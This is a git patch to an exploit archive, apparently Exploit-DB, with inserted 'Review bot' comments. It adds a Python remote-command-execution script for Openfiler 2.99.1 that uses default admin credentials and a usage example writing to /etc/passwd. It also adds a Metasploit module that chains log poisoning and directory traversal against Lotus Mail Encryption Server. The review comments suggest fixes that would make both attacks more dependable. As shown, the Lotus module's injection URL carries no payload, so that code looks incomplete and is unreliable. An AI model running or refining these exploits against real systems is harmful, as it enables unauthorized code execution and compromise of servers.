From c0a405fe68488b440b1a58e99620b2ce3a99ab5f Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 24 Dec 2014 04:50:12 +0000
Subject: [PATCH] Updated 12_24_2014
---
 files.csv | 1 +
 platforms/hardware/webapps/33247.txt | 47 +++++++++++++-
 platforms/php/remote/35588.rb | 91 ++++++++++++++++++++++++++++
 3 files changed, 138 insertions(+), 1 deletion(-)
 create mode 100755 platforms/php/remote/35588.rb
diff --git a/files.csv b/files.csv
index 0569f7d29..46262adde 100755
--- a/files.csv
+++ b/files.csv
@@ -32045,3 +32045,4 @@ id,file,description,date,author,platform,type,port
 35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
 35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0
 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082
+35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000
diff --git a/platforms/hardware/webapps/33247.txt b/platforms/hardware/webapps/33247.txt
index 36eb4dbe6..3c97520d7 100755
--- a/platforms/hardware/webapps/33247.txt
+++ b/platforms/hardware/webapps/33247.txt
@@ -37,4 +37,49 @@ Steps to reproduce / PoC:
- <-> PoC Video: https://www.youtube.com/watch?v=NzjB9U_0yLE&feature=youtu.be
\ No newline at end of file
+ <-> PoC Video: https://www.youtube.com/watch?v=NzjB9U_0yLE&feature=youtu.be
+
+#!/usr/bin/env python
+# Exploit Title: Openfiler Remote Code Execution
+# Date 21/12/2014
+# Affected Software version: 2.99.1
+# Alerted vendor: 7.5.14
+
+# Quick and dirty exploit
+# usage: python openfiler_RCE.py
+# Author: Dolev Farhi @dolevff
+
+import sys
+import urllib
+import urllib2
+import cookielib
+
+server = 'ip.add.re.ss'
+username = 'openfiler'
+password = 'password'
+timeout = 6
+command = '`' + ' '.join(sys.argv[1:]) + '`'
+
+if len(sys.argv[1:]) == 0:
+ print 'Missing argument (command)'
+ print 'example: python openfilerRCE.py echo > /etc/passwd'
+ sys.exit(0)
+
+try:
+ cj = cookielib.CookieJar()
+ opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+ login_data = urllib.urlencode({'username' : username, 'password' : password})
+ opener.open('https://' + server + ':446/account/login.html', login_data, timeout=timeout)
+ payload = urllib.urlencode({'hostname' : command,'netconf' : 'Update'})
+ url = 'https://%s:446/admin/system.html' % (server)
+ resp = opener.open(url)
+ if 'logout.html' in resp.read():
+ opener.open('https://' + server + ':446/admin/system.html', payload)
+ print ('Executed %s :-)' %(command))
+ sys.exit(0)
+except urllib2.URLError, e:
+ print 'Error: %s' %(e.reason)
+ sys.exit(1)
+except Exception, e:
+ print 'Error: possibily invalid credentials, try again.'
+ sys.exit(1)
diff --git a/platforms/php/remote/35588.rb b/platforms/php/remote/35588.rb
new file mode 100755
index 000000000..553f8cad0
--- /dev/null
+++ b/platforms/php/remote/35588.rb
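Review bot: The Openfiler RCE script is appended to `platforms/hardware/webapps/33247.txt`, an unrelated advisory whose hunk context ends in a PoC video link, and the files.csv hunk in this commit indexes only 35588, so the new exploit lands in the wrong file and is not discoverable through the index; it looks like it was meant to be its own `platforms/<platform>/webapps/<id>.py` entry with a files.csv row. The usage string `print 'example: python openfilerRCE.py echo > /etc/passwd'` is misleading and locally dangerous: the unquoted `>` is consumed by the operator's own shell, redirecting the script's stdout into the local /etc/passwd rather than reaching the remote `hostname` field, so the example should quote the command, e.g. `python openfilerRCE.py 'id > /tmp/out'`. The trailing `except Exception, e:` reports every non-URLError failure as "invalid credentials" and drops `e`; printing the exception there (`print 'Error: %s' % e`) would save a wrong diagnosis. Note also that the Python 2 urllib2 of this date does not verify the server certificate by default, so the hard-coded admin credentials are posted to whatever answers on :446.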
@@ -0,0 +1,91 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::HttpServer::PHPInclude
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Lotus Mail Encryption Server (Protector for Mail) Local File Inclusion',
+ 'Description' => %q{
+ This module exploits a local file inclusion vulnerability in
+ the Lotus Mail Encryption Server (Protector for Mail Encryption)
+ administration setup interface. The index.php file uses an unsafe include()
+ where an unauthenticated remote user may read (traversal) arbitrary file contents.
+ By abusing a second bug within Lotus, we can inject our payload
+ into a known location and call it via the LFI to gain remote code execution.
+ Version 2.1.0.1 Build(88.3.0.1.4323) is known to be vulnerable.
+ You may need to set DATE in the format YYYY-MM-DD to get this working,
+ where the remote host and metasploit instance have UTC timezone differences.
+ },
+ 'Author' => [ 'patrick' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://www.osisecurity.com.au/advisories/' ], #0day
+ #[ 'CVE', 'X' ],
+ [ 'OSVDB', '87556'],
+ #[ 'BID', 'X' ],
+ ],
+ 'Privileged' => false,
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [[ 'Lotus Mail Encryption Server 2.1.0.1', { }]],
+ 'DisclosureDate' => 'Nov 9 2012',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(9000),
+ OptBool.new('SSL', [true, 'Use SSL', true]),
+ OptString.new("DATE", [false, 'The date of the target system log file in YYYY-MM-DD format']),
+ ], self.class)
+ end
+
+ def check
+ res = send_request_cgi( { 'uri' => '/' })
+ if (res.code == 302 && res.body.match(/GetLoginScreen.uevent/))
+ return Exploit::CheckCode::Detected
+ end
+ return Exploit::CheckCode::Safe
+ end
+
+ def php_exploit
+
+ logfile = datastore['DATE'] ? datastore['DATE'] : Time.now.strftime("%Y-%m-%d")
+ if (logfile !~ /\d\d\d\d-\d\d-\d\d/) # if set by user datastore...
+ print_error("DATE is in incorrect format (use 'YYYY-MM-DD'). Unable to continue.")
+ return
+ end
+
+ # set up the initial log file RCE - this is unescaped ascii so we can execute it
+ # later >:) uid is tomcat so we cannot read apache's logs, and we are stuck inside
+ # tomcat's php-cgi wrapper which prevents /proc/* injection and a lot of the
+ # filesystem. example good injected log: '/var/log/ovid/omf-2012-08-01.log' patrick
+
+ inject_url = "/omc/GetSetupScreen.event?setupPage=" # no whitespace
+ res = send_request_cgi( { 'uri' => inject_url })
+
+ if (res and res.code == 404 and res.body.match(/Lotus Protector for Mail Encryption - Page Not Found/)) # it returns a 404 but this is good.
+ vprint_good("Payload injected...")
+
+ response = send_request_cgi( {
+ 'uri' => '/omc/pme/index.php',
+ 'cookie' => "slaLANG=../../../../../../var/log/ovid/omf-#{logfile}.log%00;", # discard .php
+ })
+ end
+ end
+end
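Review bot: `check` dereferences `res.code` without guarding a nil response, so a refused or timed-out connection raises instead of returning a check code, while `php_exploit` below already uses the guarded `res and res.code == 404` form; `check` should match it, e.g. `return Exploit::CheckCode::Unknown unless res` before the `if`. As rendered here, `inject_url = "/omc/GetSetupScreen.event?setupPage="` carries no payload at all, yet the `# no whitespace` comment and the "Payload injected..." message imply a PHP fragment stood in that query value; a `<?php ...?>` tag may have been stripped when this page was extracted, but if the file really sends an empty `setupPage` the later cookie-traversal include pulls in an inert log line and no session is possible, so the line is worth confirming against the upstream module. When the 404 fingerprint does not match, the method falls off the end silently and `response` is never used; an `else` branch with `print_error("Injection request did not return the expected 404 - is the target version 2.1.0.1?")` would tell the operator why nothing came back. The DATE check `logfile !~ /\d\d\d\d-\d\d-\d\d/` is unanchored and accepts any value that merely contains a date, which then goes verbatim into the `slaLANG` traversal cookie; `/\A\d{4}-\d{2}-\d{2}\z/` pins it to the format the option text promises.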